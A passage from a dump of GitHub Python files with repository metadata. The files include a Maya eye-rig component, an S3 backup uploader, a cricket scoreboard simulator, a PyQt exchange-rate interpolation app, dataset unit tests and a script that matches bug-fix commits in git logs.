= f.readline()\n tmp=line.split(',')\n for i in tmp:\n b=i.strip('\"')\n parts.append(b)\n parts.sort()\n return parts\n\n\ndef get_scores(lst):\n su = 0\n c = 1\n for i in lst:\n coin = 0\n for j in i:\n coin += alp[j]\n su += coin * c\n c += 1\n return su\n\n\nlst = get_names()\nprint(get_scores(lst))\n\n\n\n\n\n\n","repo_name":"fedostep/names","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"14495792039","text":"import pymel.core as pm\nfrom luna import Logger\nimport luna_rig\nimport luna_rig.functions.attrFn as attrFn\nimport luna_rig.functions.transformFn as transformFn\n\nDEFAULT_AIM_VECTOR = transformFn.WorldVector.Z.value\nDEFAULT_UP_VECTOR = transformFn.WorldVector.Y.value\n\n\nclass EyeComponent(luna_rig.AnimComponent):\n\n @property\n def aim_control(self):\n return luna_rig.Control(self.pynode.aimControl.get())\n\n @property\n def fk_control(self):\n return luna_rig.Control(self.pynode.fkControl.get())\n # ============ Getter methods =========== #\n\n def get_aim_control(self):\n return self.aim_control\n\n def get_fk_control(self):\n return self.fk_control\n\n @classmethod\n def create(cls,\n aim_locator,\n eye_joint,\n side=\"c\",\n name=\"eye\",\n character=None,\n meta_parent=None,\n hook=0,\n aim_vector=DEFAULT_AIM_VECTOR,\n up_vector=DEFAULT_UP_VECTOR,\n target_wire=False,\n tag=\"face\"):\n # Parse arguments\n if isinstance(aim_vector, str):\n aim_vector = aim_vector.upper()\n if aim_vector not in 'XYZ':\n Logger.warning('{0}: Aim vector must be either x, y or z. Got {1}. Using default z'.format(cls.as_str(name_only=True), aim_vector))\n aim_vector = DEFAULT_AIM_VECTOR.value\n else:\n aim_vector = transformFn.WorldVector[aim_vector].value\n\n if isinstance(up_vector, str):\n up_vector = up_vector.upper()\n if up_vector not in 'XYZ':\n Logger.warning('{0}: Up vector must be either x, y or z. Got {1}. Using default y'.format(cls.as_str(name_only=True), up_vector))\n up_vector = DEFAULT_UP_VECTOR.value\n else:\n up_vector = transformFn.WorldVector[up_vector].value\n\n # Create instance, add attributes\n instance = super(EyeComponent, cls).create(meta_parent=meta_parent, side=side, name=name, hook=hook, character=character, tag=tag) # type: EyeComponent\n instance.pynode.addAttr(\"aimControl\", at=\"message\")\n instance.pynode.addAttr(\"fkControl\", at=\"message\")\n eye_joint = pm.PyNode(eye_joint)\n attrFn.add_meta_attr(eye_joint)\n\n # Controls\n fk_orient_vec = aim_vector.cross(up_vector)\n fk_control = luna_rig.Control.create(name=\"{0}_fk\".format(instance.indexed_name),\n side=instance.side,\n guide=eye_joint,\n delete_guide=False,\n parent=instance.group_ctls,\n attributes=\"trs\",\n joint=True,\n orient_axis=transformFn.get_axis_name_from_vector3(fk_orient_vec),\n shape=\"circle_pointed\")\n\n aim_control = luna_rig.Control.create(name=\"{0}_aim\".format(instance.indexed_name),\n side=instance.side,\n guide=aim_locator,\n parent=instance.group_ctls,\n delete_guide=True,\n attributes=\"t\",\n shape=\"circle\",\n orient_axis=\"z\",\n tag=\"face\")\n pm.aimConstraint(aim_control.transform, fk_control.group, aim=aim_vector, u=up_vector)\n if target_wire:\n aim_control.add_wire(fk_control.group)\n\n # Connections\n instance.connect_to_character(parent=True)\n instance.attach_to_component(meta_parent, hook)\n instance._store_bind_joints([eye_joint])\n instance._store_ctl_chain([fk_control.joint])\n instance._store_controls([fk_control, aim_control])\n aim_control.transform.metaParent.connect(instance.pynode.aimControl)\n fk_control.transform.metaParent.connect(instance.pynode.fkControl)\n\n return instance\n\n def attach_to_component(self, other_comp, hook_index=0):\n super(EyeComponent, self).attach_to_component(other_comp, hook_index=hook_index)\n if self.in_hook:\n pm.parentConstraint(self.in_hook.transform, self.root, mo=1)\n","repo_name":"sowwic/luna","sub_path":"luna_rig/components/eye_component.py","file_name":"eye_component.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"30"} +{"seq_id":"74761021203","text":"import subprocess\nimport boto3\nimport os\nimport threading\nimport sys\n\nclass ProgressPercentage(object):\n def __init__(self, filename, size):\n self._size = float(size)\n self._seen_so_far = 0\n self._lock = threading.Lock()\n def __call__(self, bytes_amount):\n # To simplify we'll assume this is hooked up\n # to a single filename.\n with self._lock:\n self._seen_so_far += bytes_amount\n percentage = (self._seen_so_far / self._size) * 100\n sys.stdout.write(\"... %s / %s (%.2f%%)\" % \n (self._seen_so_far, self._size, percentage))\n if (self._seen_so_far == self._size):\n sys.stdout.write(\"\\n\") \n sys.stdout.flush()\n\n\n\nclass S3Uploader:\n def __init__(self):\n pass\n\n @staticmethod\n def upload(path_to_upload, bucket):\n s3 = boto3.client('s3')\n key = os.path.basename(path_to_upload)\n size = os.path.getsize(path_to_upload)\n progress = ProgressPercentage(path_to_upload, size)\n s3.upload_file(path_to_upload, bucket, key, Callback=progress) \n head_dict = s3.head_object(Bucket=bucket, Key=key)\n if head_dict['ContentLength'] != size: \n raise Exception('got file in S3 with different size')\n","repo_name":"readdle/mysql_backup","sub_path":"src/common/S3Uploader.py","file_name":"S3Uploader.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"24751860890","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\n\ndataset = pd.read_csv('weatherHistory.csv')\n\nx = dataset.iloc[:500, 3].values.reshape(-1, 1)\ny = dataset.iloc[:500, 5].values.reshape(-1, 1)\nprint(x)\nprint(y)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\n\nregressor = RandomForestRegressor(n_estimators=20)\nregressor.fit(x_train, y_train)\n\n# Visualizing the training set results\n\nx_grid = np.arange(min(x_train), max(x_train), 0.5).reshape(-1, 1)\nplt.scatter(x_train, y_train, color=\"pink\")\nplt.plot(x_grid, regressor.predict(x_grid), color=\"blue\")\nplt.title('Humidity Vs Temperature(Training Set)')\nplt.xlabel('Humidity')\nplt.ylabel('Temperature')\nplt.show()\n\n# Visualizing the test set\nplt.scatter(x_test, y_test, color=\"pink\")\nplt.plot(x_grid, regressor.predict(x_grid), color=\"blue\")\nplt.title('Humidity Vs Temperature(Test Set)')\nplt.xlabel('Humidity')\nplt.ylabel('Temperature')\nplt.show()\n","repo_name":"rachelcynthia/Machine-Learning-Projects","sub_path":"7-Random-Forest-Regression/Example2/Example2.py","file_name":"Example2.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"25126147490","text":"import turtle\r\n\r\nclass Polygon:\r\n #must include self\r\n #every parameter after self is what we will have to include when instantiating an object\r\n #but \"size\" is a default parameter i.e. it will be 100 unless explictly passed in a value\r\n def __init__(self, sides, name, size = 100):\r\n self.sides = sides\r\n self.name = name\r\n self.size = size\r\n\r\n def draw(self):\r\n for i in range(self.sides):\r\n turtle.forward(self.size)\r\n turtle.left(360 / self.sides)\r\n turtle.done()\r\n\r\nsquare = Polygon(4, \"square\")\r\npentagon = Polygon(5, \"pentagon\")\r\n\r\n#pentagon.draw()\r\n\r\nhexagon = Polygon(6, \"hexagon\", 50)\r\n#hexagon.draw()\r\n\r\n\r\n#Inheritance\r\nclass Square(Polygon):\r\n def __init__(self, size = 100):\r\n # __init__ is kinda like the constructor in java\r\n super().__init__(4, \"square\", size)\r\n\r\n #Overriding methods, no need for override annotation i think like in Java\r\n def draw(self):\r\n turtle.color(\"blue\")\r\n #remem it is \"super()\", NOT \"super\"\r\n super().draw()\r\n\r\n\r\nsquare1 = Square(30)\r\nsquare1.draw()\r\n","repo_name":"HS116/Python-Tutorials","sub_path":"OOP_Practise.py","file_name":"OOP_Practise.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"8056663630","text":"import numpy as np\nfrom scipy import stats as st\n\ndata_set = [\n 364, 373, 358, 394, 378, 379, 357, 364, 350,\n 363, 392, 368, 359, 375, 399, 365, 379, 357, 380\n]\n\n\nprint(\n f\"mean - {np.mean(data_set)}\",\n f\"median - {np.median(data_set)}\",\n # returns only one value-repetition occurrence for multiple occurrences\n f\"mode - {st.mode(data_set, keepdims=True)}\",\n f\"standard deviation - {np.std(data_set)}\",\n sep=\"\\n\",\n)\n","repo_name":"Andriy-Makarenko/atlas_magnetics","sub_path":"nym_py_library.py","file_name":"nym_py_library.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"26204740486","text":"\"\"\"Test the construction of :py:class:`lmp.dset._demo.DemoDset`.\n\nTest target:\n- :py:meth:`lmp.dset._demo.DemoDset.__init__`.\n\"\"\"\n\nimport re\n\nimport lmp.dset._demo\n\n\ndef test_default_version() -> None:\n \"\"\"Must be able to construct the default version.\"\"\"\n dset = lmp.dset._demo.DemoDset(ver=None)\n assert dset.ver == lmp.dset._demo.DemoDset.df_ver\n\n\ndef test_all_verions() -> None:\n \"\"\"Must be able to construct all versions of :py:class:`lmp.dset._demo.DemoDset`.\"\"\"\n for ver in lmp.dset._demo.DemoDset.vers:\n dset = lmp.dset._demo.DemoDset(ver=ver)\n assert dset.ver == ver\n assert len(dset) > 0\n assert all(map(lambda spl: isinstance(spl, str), dset))\n assert all(map(lambda spl: len(spl) > 0, dset))\n\n\ndef test_consistent_format() -> None:\n \"\"\"Must have consistent format.\"\"\"\n pttn = re.compile(r'If you add (\\d+) to (\\d+) you get (\\d+) \\.')\n for ver in lmp.dset._demo.DemoDset.vers:\n for spl in lmp.dset._demo.DemoDset(ver=ver):\n match = pttn.match(spl)\n assert match\n\n num_1 = int(match.group(1))\n num_2 = int(match.group(2))\n assert 0 <= num_1 <= 99\n assert 0 <= num_2 <= 99\n assert num_1 + num_2 == int(match.group(3))\n\n\ndef test_mutually_exclusive() -> None:\n \"\"\"Different versions are mutually exclusive.\"\"\"\n dsets = []\n total_size = 0\n for ver in lmp.dset._demo.DemoDset.vers:\n dset = lmp.dset._demo.DemoDset(ver=ver)\n total_size += len(dset)\n dsets.append(set(dset))\n\n # Check mutually exclusive.\n # If different versions of dataset are mutually exclusive, then their union size must be\n # the total number of dataset samples.\n dset_union = set()\n for dset in dsets:\n dset_union = dset_union | dset\n assert len(dset_union) == total_size\n\n\ndef test_commutative() -> None:\n \"\"\"Training and validation sets are consist of commutative pairs of additions.\"\"\"\n pttn = re.compile(r'If you add (\\d+) to (\\d+) you get \\d+ \\.')\n train = lmp.dset._demo.DemoDset(ver='train')\n valid = lmp.dset._demo.DemoDset(ver='valid')\n\n train_pool = set()\n for spl in train:\n match = pttn.match(spl)\n num_1 = match.group(1)\n num_2 = match.group(2)\n train_pool.add((num_1, num_2))\n\n # If `a + b` is in training set, then `b + a` must be in validation set.\n for spl in valid:\n match = pttn.match(spl)\n num_1 = match.group(1)\n num_2 = match.group(2)\n assert (num_2, num_1) in train_pool\n\n\ndef test_multiply_by_2() -> None:\n \"\"\"Test sets are consist of a + a = 2a.\"\"\"\n pttn = re.compile(r'If you add (\\d+) to (\\d+) you get (\\d+) \\.')\n test = lmp.dset._demo.DemoDset(ver='test')\n\n for spl in test:\n match = pttn.match(spl)\n num_1 = match.group(1)\n num_2 = match.group(2)\n num_3 = match.group(3)\n assert num_1 == num_2\n assert 2 * int(num_1) == int(num_3)\n","repo_name":"ProFatXuanAll/language-model-playground","sub_path":"test/lmp/dset/_demo/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"30"} +{"seq_id":"7654960643","text":"import collections as cl\nimport math\n\nN = int(input())\n\nAB = [tuple(map(int, input().split())) for _ in range(N)]\n\n\nx = sorted([(a, 1) for a, b in AB] + [(a + b, -1) for a, b in AB])\n\nc = 0\nans = [0 for _ in range(N + 1)]\nfor i in range(len(x) - 1):\n c += x[i][1]\n ans[c] += x[i + 1][0] - x[i][0]\n\nprint(*ans[1:])\n","repo_name":"HomeSox/AtCoder","sub_path":"satory074/abc221/d/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"1277643145","text":"from itertools import product\n\nimport click\nfrom tqdm import tqdm\n\nfrom .cost import get_cost\n\n\n@click.command()\n@click.argument(\"source-currency\", type=click.STRING)\n@click.argument(\"target-amount\", type=click.STRING)\n@click.argument(\"target-currency\", type=click.STRING)\n@click.option(\"-i\", \"--pay-in-method\", type=click.STRING, default=\"VISA_CREDIT\")\n@click.option(\"-o\", \"--pay-out-method\", type=click.STRING, default=\"BALANCE\")\ndef cli(\n source_currency: str,\n target_amount: str,\n target_currency: str,\n pay_in_method: str,\n pay_out_method: str,\n):\n sources = source_currency.split(\",\")\n amounts = [float(x) for x in target_amount.split(\",\")]\n targets = target_currency.split(\",\")\n\n costs = [\n get_cost(\n source,\n float(amount),\n target,\n pay_in_method=pay_in_method,\n pay_out_method=pay_out_method,\n )\n for source, amount, target in tqdm(list(product(sources, amounts, targets)))\n ]\n\n # sort by total fee rate\n costs = sorted(costs, key=lambda x: x.price.variable_fee_percent)\n\n # print costs\n for cost in costs:\n print(cost)\n","repo_name":"narumiruna/wise","sub_path":"wise/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"41286696240","text":"import random\n\nclass T2CUP:\n allTeams = []\n def entry_team(self,teamName):\n self.allTeams.append(teamName)\n\n \n\nclass Team(T2CUP):\n def __init__(self, name) -> None:\n self.teamName = name\n self.playersName = []\n super().entry_team(self)\n def entry_players(self, player):\n self.playersName.append(player)\n def __repr__(self) -> str:\n return f\"Team Name {self.teamName}\"\n\nclass Player:\n def __init__(self,name, teamNameObj) -> None:\n self.playerName = name\n self.strikeRate = 0.0\n self.runBat = 0\n self.usedBall = 0\n self.fours = 0\n self.sixs = 0\n self.runBall = 0\n self.wicketsTaken = 0\n self.ballBowld = 0\n teamNameObj.playersName.append(self)\n def __repr__(self) -> str:\n return f\"Form player Obj : {self.playerName}\"\n\nclass Innings:\n def __init__(self,teamOne,teamTwo,battingTeam,bowlingTeam) -> None:\n self.teamOne = teamOne\n self.teamOne = teamTwo\n self.battingTeam = battingTeam\n self.BowlingTeam = bowlingTeam\n self.totalRun = 0\n self.totalWickets = 0\n self.totalOver = 0\n self.currentBall = 0\n self.currentBatsmanOrder = 2\n self.currentBattingList = [battingTeam.playersName[0],battingTeam.playersName[1]]\n self.striker = battingTeam.playersName[0]\n self.currentBowler = None\n self.currentOverStatus = []\n self.allOverstatus = []\n self.target = None\n def show_score_board(self):\n print(f\"*{self.currentBattingList[0].playerName} - {self.currentBattingList[0].runBat} ({self.currentBattingList[0].usedBall})\", end=\"\\t\")\n print(f\"{self.currentBattingList[1].playerName} - {self.currentBattingList[1].runBat} ({self.currentBattingList[1].usedBall})\")\n print(f\"{self.battingTeam.teamName[:3].upper()} Total Run : ({self.totalRun}-{self.totalWickets})W\")\n print(f\"Overs:({self.totalOver}.{self.currentBall})Ball\")\n if self.currentBowler != None:\n print(f\"Bowler Name : {self.currentBowler.playerName} Give runs : {self.currentBowler.runBall} Bowl : {self.currentBowler.ballBowld}\")\n if self.currentBall > 0:\n print(\"Current Over - \",end=\"\")\n for i in self.currentOverStatus:\n print(i,end=\" \")\n print(\"\\n\")\n if self.currentBall == 0 and self.totalOver > 0:\n print(\"Last Over - \",end=\"\")\n for i in self.allOverstatus[-1]:\n print(i,end=\" \")\n print(\"\\n\")\n if self.target is not None:\n print(f\"Target : {self.target}\")\n if self.target > self.totalRun:\n print(f\"Need {self.target - self.totalRun}'runs from {12-self.totalOver*6 + self.currentBall} balls.\")\n def entry_bowler(self,bowlerNameObj):\n self.currentBowler = bowlerNameObj\n\n def playBowl(self,status):\n run = 0\n extraRun = 0\n isNoBall = False\n isWide = False\n willStrikeChange = False\n isWicket = False\n if status[0] >= '0' and status[0] <= '9':\n run = int(status)\n if run%2 != 0:\n willStrikeChange = True\n else:\n if status[0] == 'W' and len(status) == 1:\n isWicket = True\n elif status[0] == 'N':\n isNoBall = True\n extraRun = 1\n run = int(status[1])\n if run%2 !=0:\n willStrikeChange = True\n elif status[0] == 'W':\n isWide = True\n extraRun = 1+int(status[1])\n if int(status[1]) % 2 == 1:\n willStrikeChange = True\n\n self.totalRun += run + extraRun\n self.striker.runBat += run\n if run == 4:\n self.striker.fours+=1\n if run == 6:\n self.striker.sixs += 1\n if isWide == False:\n self.striker.usedBall +=1\n self.currentBowler.runBall += run + extraRun\n self.currentOverStatus.append(status)\n if isWide == False and isNoBall == False:\n self.currentBowler.ballBowld += 1\n self.currentBall += 1\n if self.currentBall == 6:\n self.currentBall = 0\n self.totalOver += 1\n willStrikeChange = True\n self.allOverstatus.append(self.currentOverStatus)\n self.currentOverStatus = []\n \n\n if isWicket == True:\n if self.totalWickets > 9:\n return \"end\"\n print()\n print(f\"Last wicket : {self.striker.playerName}\\t Runs : {self.striker.runBat}\\tPlayed {self.striker.usedBall}'Balls\\tWicket taken by {self.currentBowler.playerName}\")\n print(f\"Strike rate : {self.striker.runBat*100/self.striker.usedBall}\")\n print(f\"Fours : {self.striker.fours}\\tSix's : {self.striker.sixs}\")\n self.currentBattingList[0] = self.battingTeam.playersName[self.currentBatsmanOrder]\n self.currentBatsmanOrder += 1\n self.striker = self.currentBattingList[0]\n self.totalWickets += 1\n self.currentBowler.wicketsTaken += 1\n print()\n\n if willStrikeChange == True:\n self.currentBattingList[0],self.currentBattingList[1] = self.currentBattingList[1],self.currentBattingList[0]\n self.striker = self.currentBattingList[0]\n \n return \"0\"\n \n\n\n\ncup = T2CUP()\n# Team Bangladesh\nbangladesh = Team(\"Bangladesh\")\nTamim = Player(\"Tamim Iqbal\", bangladesh)\nSakib = Player(\"Sakib Al Hasan\",bangladesh)\nMushfiq = Player(\"Mushfiqur Rahim\",bangladesh) \nMustafiz = Player(\"Mustafizur Rahman\",bangladesh) \nLiton = Player(\"Liton Das\",bangladesh) \nMahmudullah = Player(\"Mahmudullah\",bangladesh)\nRubel = Player(\"Rubel Hossain\",bangladesh)\nImrul = Player(\"Imrul Kayes\",bangladesh)\nSoumya = Player(\"Soumya Sarker\",bangladesh)\nAfif = Player(\"Afif Hossain\",bangladesh)\nTaskin = Player(\"Taskin Ahmed\",bangladesh)\n\n# print(bangladesh.teamName)\n# print(bangladesh.playersName)\n\n# Team India\nindia = Team(\"India\") \nKohli = Player(\"Virat Kohli\",india) \nRohit = Player(\"Rohit Sharma\",india)\nDinesh = Player(\"Dinesh Kartik\",india)\nRishabh = Player(\"Rishabh Pant\",india)\nRavichandran = Player(\"Ravichandran Ashwin\",india)\nKl = Player(\"KL Rahul\",india)\nHardik = Player(\"Hardik Pandya\",india)\nShami = Player(\"Mohammad Shami\",india)\nRavindra = Player(\"Ravindra Jadeja\",india)\nBumrah = Player(\"Jasprith Bumrah\",india)\nMs = Player(\"Mahindra Singh Donni\",india)\n\n# match = Innings(bangladesh,india,bangladesh,india)\n# match.show_score_board()\n\n\nwhile True:\n print(\"Select two teams to played\")\n for index, name in enumerate(cup.allTeams):\n print(f\"{index+1}. {name.teamName}\")\n teamOne,teamTwo = map(int,input(\"Enter two teams index : \").split(\" \"))\n teamOne-=1\n teamTwo-=1\n teamOneObj = cup.allTeams[teamOne]\n teamTwoObj = cup.allTeams[teamTwo]\n tossWinTeam = random.choice([teamOne,teamTwo])\n print(f\"{cup.allTeams[tossWinTeam].teamName} Win the toss.\")\n if tossWinTeam == teamOne:\n tossLoseTeam = teamTwo\n else:\n tossLoseTeam = teamOne\n rand = random.choice([0,1])\n if rand == 0:\n print(f\"{cup.allTeams[tossWinTeam]} choice bowling fast.\")\n battingTeamNameObj = cup.allTeams[tossLoseTeam]\n bowlingTeamNameObj = cup.allTeams[tossWinTeam]\n else:\n print(f\"{cup.allTeams[tossWinTeam]} choice batting fast.\")\n battingTeamNameObj = cup.allTeams[tossWinTeam]\n bowlingTeamNameObj = cup.allTeams[tossLoseTeam]\n\n # Fast ininngs start\n fastInnings = Innings(teamOneObj,teamTwoObj,battingTeamNameObj,bowlingTeamNameObj)\n fastInnings.show_score_board()\n print()\n over = 0\n while over < 2:\n isOff = False\n print(\"Choice a bowler : \")\n for index , name in enumerate(bowlingTeamNameObj.playersName):\n print(f\"{index+1}. {name.playerName}\")\n bowlerIndex = int(input(\"Enter player index : \"))\n bowlerIndex -= 1\n bowlerNameObj = bowlingTeamNameObj.playersName[bowlerIndex]\n fastInnings.entry_bowler(bowlerNameObj)\n print(\"\\n\")\n\n while True:\n status = input(\"Enter status : \")\n recive = fastInnings.playBowl(status)\n if recive == \"end\":\n isOff = True\n break\n fastInnings.show_score_board()\n if (fastInnings.totalOver*6 + fastInnings.currentBall) % 6 == 0:\n break \n print(\"\\n\")\n over += 1\n if isOff == True:\n break\n print(f\"Target is {fastInnings.totalRun+1}\")\n # Second ininngs start\n battingTeamNameObj,bowlingTeamNameObj = bowlingTeamNameObj,battingTeamNameObj\n secondInnings = Innings(teamOneObj,teamTwoObj,battingTeamNameObj,bowlingTeamNameObj)\n secondInnings.target = fastInnings.totalRun + 1\n over = 0\n while over < 2:\n isOff = False\n print(\"Choice a bowler : \")\n for index , name in enumerate(bowlingTeamNameObj.playersName):\n print(f\"{index+1}. {name.playerName}\")\n bowlerIndex = int(input(\"Enter player index : \"))\n bowlerIndex -= 1\n bowlerNameObj = bowlingTeamNameObj.playersName[bowlerIndex]\n secondInnings.entry_bowler(bowlerNameObj)\n print(\"\\n\")\n\n while True:\n status = input(\"Enter status : \")\n recive = secondInnings.playBowl(status)\n if recive == \"end\":\n isOff = True\n break\n secondInnings.show_score_board()\n if (secondInnings.totalOver*6 + secondInnings.currentBall) % 6 == 0:\n break \n over += 1\n if isOff == True:\n break\n if secondInnings.totalRun >= secondInnings.target:\n print(f\"{secondInnings.battingTeam.teamName} wins.\")\n else:\n print(f\"{secondInnings.BowlingTeam.teamName} wins.\")\n break\n \n\n\n","repo_name":"amitsarker95/Cricket_Board_Management_System_with_Python","sub_path":"cricket_bord_management_system.py","file_name":"cricket_bord_management_system.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"37193877543","text":"# -*- coding: utf-8 -*-\r\n#author: Radosław Schwichtenberg\r\nimport numpy as np\r\nimport sys\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWidgets import QWidget, QListWidget, QListWidgetItem, QLabel, QPushButton, QGridLayout, QApplication\r\nimport urllib.request, json\r\nimport datetime as dt\r\nimport pylab as plb\r\nimport matplotlib.pyplot as plt # font,wykres\r\nimport matplotlib.patheffects as PathEffects\r\n\r\n#pobranie pliku json i otworzenie go\r\nfile = urllib.request.urlopen('http://api.nbp.pl/api/exchangerates/tables/a/last/10?format=json').read().decode('utf8')\r\nvalues = json.loads(file)\r\n# do obliczen wybrałem 10 ostatnich kursów\r\n#czcionka dla wykresu\r\nplt.rc('font', family='serif', serif='Times New Roman')\r\n#interpolacja-przyjmowanie w pewnym przedziale funkcji znanych wartosci dla danych liczb\r\n#interpolacja wielomianowa metodą Lagrange-a, punkty interpolacji są tam gdzie zielona linia przecina niebieska\r\n#interpolacja wielomianowa metodą Lagrange-a ma na celu przyblizenia danych, Lagrange udowodnił, że wielomian odpowiednio wysokiego stopnia może interpowolować każdy zbiór danych, ale nie zawsze można dobrać taki wielomian \r\ndef interpolacja_lagrange(x, y, xval):\r\n \"\"\"\r\n x - argument funkcji\r\n y - wartość funkcji\r\n xval - wartość interpolowana funkcji\r\n funkcja obliczajaca wartosc interpolowana funkcji yval w punkcie xval\r\n \"\"\"\r\n products = 0\r\n yval = 0\r\n for i in range(len(x)):\r\n products = y[i]\r\n for j in range(len(x)):\r\n if i != j:\r\n products = products * (xval - x[j]) / (x[i] - x[j])\r\n yval = yval + products\r\n return yval\r\n#aproksymacja ma za zadanie przyblizenie konkretną funkcje danego zbioru danych\r\n#aproksymacja(ocena na oko,dopasowanie jak z najmniejszym bledem) i wykres\r\ndef swapRows(v,i,j):\r\n if len(v.shape) == 1:\r\n v[i],v[j] = v[j],v[i]\r\n else:\r\n v[[i,j],:] = v[[j,i],:]\r\n \r\ndef swapCols(v,i,j):\r\n v[:,[i,j]] = v[:,[j,i]]\r\n\r\n \r\n#elimacja gaussa->tabela przestawna ,algorytm macierzowy,musielismy przerzucic macierz\r\ndef elimacjagaussa(a, b, tol = 1.0e5):\r\n n = len(b)\r\n s = np.zeros(n) \r\n for i in range(n):\r\n s[i] = max(np.abs(a[i,:]))\r\n \r\n for k in range(0, n-1):\r\n p = np.argmax(np.abs(a[k:n, k])/s[k:n])+k\r\n if abs(a[p, k])1:\r\n j=0\r\n y = [values[i-1]['rates'][a]['mid'], values[i]['rates'][a]['mid']]\r\n x = [i for i in range(len(y))]\r\n xval = [i for i in np.arange(0, 1, 1/relatywnosc_dni)]\r\n yval = []\r\n ytemp = []\r\n print('Interpolacja w dniach: %s - %s:' % (values[i-1]['effectiveDate'], values[i]['effectiveDate']))\r\n for xv in xval:\r\n data = (dt.datetime.strptime(values[i]['effectiveDate'], '%Y-%m-%d')-dt.timedelta(days=relatywnosc_dni-j)).__format__('%Y-%m-%d')\r\n yval.append ('%s:# %.4f\\n' % (data, interpolacja_lagrange(x, y, xv)))\r\n ytemp.append(interpolacja_lagrange(x, y, xv))\r\n j+=1 \r\n for j in range(1, len(yval)):\r\n temp.append(yval[j])\r\n yappr.append(ytemp[j])\r\n temp.append ('%s: %.2f\\n' % (values[i]['effectiveDate'], values[i]['rates'][a]['mid']))\r\n yappr.append (values[i]['rates'][a]['mid'])\r\n else:\r\n yappr.append (values[i]['rates'][a]['mid'])\r\n temp.append ('%s: %.2f\\n' % (values[i]['effectiveDate'], values[i]['rates'][a]['mid']))\r\n print(30*'**')\r\n temp.reverse()\r\n text = ''.join(temp)\r\n self.opis.setText(text)\r\n self.informacja.setText('Kursy wybranej waluty: ')\r\n xappr = [i for i in range(0, len(yappr))]\r\n coeff = polyFit(xappr, yappr, 6)\r\n plotPoly('Kurs '+values[0]['rates'][a]['code'], xappr, yappr, coeff)\r\n\r\n \r\n \r\n\r\n \r\n def wyjscie(self):\r\n app = QApplication(sys.argv)\r\n sys.exit(app.exec_())\r\n \r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(sys.argv)\r\n ex = Program()\r\n font=app.font()\r\n font.setPointSize(12)\r\n font.setBold(True)\r\n app.setFont(font)\r\n sys.exit(app.exec_())\r\n\"\"\"\r\nProgram główny:\r\nuruchom pętlę\r\n'app', uruchom\r\nokno 'ex' \r\n\"\"\"\r\n","repo_name":"rk-rada/Exchange-rate","sub_path":"mn_radoslaw_schwichtenberg_18590.py","file_name":"mn_radoslaw_schwichtenberg_18590.py","file_ext":"py","file_size_in_byte":9932,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"31922744441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 22 14:21:59 2020\n@author: ichraf ben fadhel\n\"\"\"\nimport json\nimport re \n\nimport pandas as pd \nfrom dateutil.parser import parse\n\n\"\"\" this script is used to search for fix commit of issues host in bugzilla (because the format of csv file differt\"\"\"\n\n\n# to reduce the commits in which we search \ndef find_commit_candidats(gitlog_path) :\n commits_candidate=[]\n pattern=\"[Bb][Zz]-\\d+|[Bb][Zz] -\\d+|[Ii]ssue #\\d+|[Ff]ixe[sd]|[Ff]ixe|BZ \\d+|bz \\d+|[Pp][Rr]\\s\\d+|[Bb]ug\\s\\d+|#\\d+|[Bb]ugzilla\"\n \n with open(gitlog_path) as f:\n gitlog = json.loads(f.read())\n \n for commit in gitlog :\n \n if re.search(pattern,commit) is not None :\n commits_candidate.append(commit)\n \n return commits_candidate \n\n \ndef commit_selector_heuristic(commits):\n \"\"\" Helper method for find_bug_fixes.\n Commits are assumed to be ordered in reverse chronological order.\n Given said order, pick first commit that does not match the pattern.\n If all commits match, return newest one. \"\"\"\n for commit in commits:\n if not re.search('[Mm]erge|[Cc]herry|[Nn]oting', commit):\n return commit\n return commits[0]\n \n \n \n \n\ndef find_bug_fixes(issue_path, gitlog_path,original_pattern):\n \"\"\" Identify bugfixes in repository given a list of issue gitlog and issue pattern\"\"\"\n \n \n matches_per_issue={}\n no_matches=[]\n issue_list={}\n total_matches=0\n data =pd.read_csv(issue_path)\n commits_candidate=find_commit_candidats(gitlog_path)\n i=0\n \n for bug_id in data['Bug ID']:\n if \"-\" in bug_id :\n nb=bug_id.split(\"-\")[1]\n pattern=original_pattern.replace(\"\\d+\",str(nb))\n \n else :\n pattern=original_pattern.replace(\"\\d+\",str(bug_id))\n \n \"\"\"this pattern mentionned bellow that we used in the projects \"\"\"\n # pattern=\"[Bb][Zz]-\"+str(bug_id)+\"\\s|issue#\"+str(bug_id)+\"|[Bb][Zz] \"+str(bug_id)+\"\\s|[Pp][Rr] \"+str(bug_id)+\"\\s\" #ant\n # pattern=\"Bug \"+str(bug_id)+\"\\s|[Bb]ugzilla Id: \"+str(bug_id)+\" |[Bb][Zz] \"+str(bug_id)+\" \" 